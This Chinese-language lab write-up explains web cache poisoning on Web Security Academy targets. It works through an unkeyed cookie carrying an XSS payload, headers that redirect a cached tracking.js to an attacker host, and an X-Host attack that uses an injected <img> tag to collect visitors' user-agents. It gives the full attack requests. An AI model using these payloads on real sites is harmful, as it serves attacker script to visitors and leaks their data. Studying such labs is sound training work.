關於快取投毒的介紹可參考
使用header快取投毒的攻擊方式,常見有以下幾種:
- 對cookie投毒
- 搭配多個隱藏參數投毒
- 參考vary header進行投毒
對cookie投毒
目標使用cookie中的language來調整網站的語言,而且測試後發現cookie是unkeyed header
針對cookie測試後發現fehost內容會影響返回結果,請求cookie內的fehost=prod-cache-01,會在返回結果出現”frontend”:”prod-cache-01″
######## normal request ########
GET / HTTP/1.1
...omit...
Cookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01
######## normal response ########
...omit...
Cache-Control: max-age=30
Age: 0
X-Cache: miss
...omit...
<script>
data = {
"host":"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net",
"path":"/",
"frontend":"prod-cache-01"
}
</script>
...omit...因此只要對cookie內的fehost做污染,,就可以實現快取中毒攻擊
######## attack request ########
GET / HTTP/1.1
...omit...
Cookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString"-alert(1)-"someString
######## attack response ########
...omit...
Cache-Control: max-age=30
Age: 0
X-Cache: miss
...omit...
<script>
data = {
"host":"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net",
"path":"/",
"frontend":"someString"-alert(1)-"someString"
}
</script>
...omit...在30秒內如果有訪客存取相同url,則返回結果是被污染的頁面
lab: Web cache poisoning with an unkeyed cookie
搭配多個隱藏參數投毒
有時候是由2個隱藏參數才會產生返回內容的變化
以這個目標為例,透過param mining發現以下2個為隱藏參數,而且觀察發現為 unkeyed header
- X-Forwarded-Host:搭配X-Forwarded-Scheme時,這個值代表新網址
- X-Forwarded-Scheme:當值為http://會觸發302
只透過X-Forwarded-Host: example.net,看不出有什麼效果
########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Host: example.net
########## response ###########
HTTP/1.1 504 Gateway Timeout只透過X-Forwarded-Scheme: http://,可看到會出現302,如果換成https://則不會有變化
########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Scheme: http://
...omit...
########## response ###########
HTTP/1.1 302 Found
Location: https://ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net/resources/js/tracking.js
...omit...但如果合併上述2個隱藏參數,就能構造轉址的請求
只要把主機換成攻擊者主機,並在攻擊者主機的resources/js/tracking.js準備惡意代碼,就可以對快取投毒,如下
########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Host: attackwebsite
X-Forwarded-Scheme: http://
...omit...
########## response ###########
HTTP/1.1 302 Found
Location: attackwebsite/resources/js/tracking.js
Connection: close
Cache-Control: max-age=30
Age: 7
X-Cache: hit投毒後在30秒內如果有訪客存取resources/js/tracking.js,則返回結果是攻擊者提供的resources/js/tracking.js
lab: Web cache poisoning with multiple headers
參考vary header進行投毒
以這個目標為例,透過param mining發現以1個隱藏參數為X-Host,而且觀察發現為 unkeyed header,因此對該參數進行投毒如下
########## request ###########
GET / HTTP/1.1
Host: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net
X-Host: attackwebsite
...omit...
########## response ###########
...omit...
Vary: user-agent
...omit...
<script type="text/javascript" src="//attackwebsite/resources/js/tracking.js"></script>
...omit...不過這裡要注意的地方是返回內容有vary: user-agent,這代表user-agent是key header。換句話說,訪客除了要存取相同host外,user-agent也必須要一樣,才能訪問到被污染的快取內容
在這個目標網站中,留言區允許html,因此可以透過這個方式,取得每個訪客的user-agent
<img src="https://attackwebsite/foo" />訪客一但看到留言,就會觸發該html,只要到attackwebsite看網頁日志記錄,便能看到訪客的user-agent
172.31.30.128 2023-09-18 08:40:09 +0000 "GET /foo HTTP/1.1" 404 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"取得user-agent為Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36後,就可以重新構造一個投毒請求如下
########## request ###########
GET / HTTP/1.1
Host: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net
X-Host: attackwebsite
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
...omit...
########## response ###########
...omit...
<script type="text/javascript" src="//attackwebsite/resources/js/tracking.js"></script>
...omit...在30秒內如果有訪客訪問相同的host,並使用相同的user-agent,則返回結果是被污染的頁面
Lab: Targeted web cache poisoning using an unknown header